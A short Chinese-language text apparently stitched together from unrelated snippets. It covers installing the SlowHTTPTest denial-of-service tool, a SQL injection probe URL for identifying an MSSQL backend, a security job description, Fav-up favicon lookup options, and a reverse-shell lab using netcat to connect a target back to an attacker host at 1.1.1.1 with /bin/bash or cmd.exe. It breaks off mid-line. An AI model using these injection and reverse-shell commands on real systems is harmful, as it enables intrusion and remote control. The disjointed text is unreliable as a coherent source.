在kali中下载测试工具：SlowHTTPTest　　安装方法：安装openssl和libssl-dev　sudo apt-get install openssl 　　sudo apt-get install libssl-dev　安装slowhttptest 　git clone https://github.com/shekyan/slowhttptest.git

后台数据库类型判断：一、通过页面返回的报错信息，一般情况下页面报错会显示是什么数据库类型，在此不多说;二、通过各个数据库特有的数据表来判断：1、mssql数据库 sysobjectshttp://127.0.0.1/test.php?id=1 and (select count(*) from sysobjects)>0 and 1=1

关注最新的安全动态和漏洞信息,及时发现客户相关系统的漏洞,并协助相关单位进行修复跟进工作;参与客户系统安全漏洞的扫描和评估工作;客户交代的其他工作。

配置好密钥之后，我们就能够以下列几种不同方式使用Fav-up了：-f或—favicon-file：在本地存储的需要查询的Favicon网站图标文件;-fu或—favicon-url：无需在本地存储Favicon网站图标，但是需要知道目标图标的实际URL地址;

1、实验环境　　Kali:192.168.32.132 //模拟靶机　　Windows:192.168.32.1 //模拟公网vps　　2、若靶机上存在nc，获取反向shell：　　vps攻击机：nc -lvp 9999 // 监听9999端口　　靶机：nc 1.1.1.1 9999 -e /bin/bash // Linux正向连接公网vps1.1.1.1的9999端口　　nc 1.1.1.1 9999 -e c:\windows\system32\cmd.exe // Wind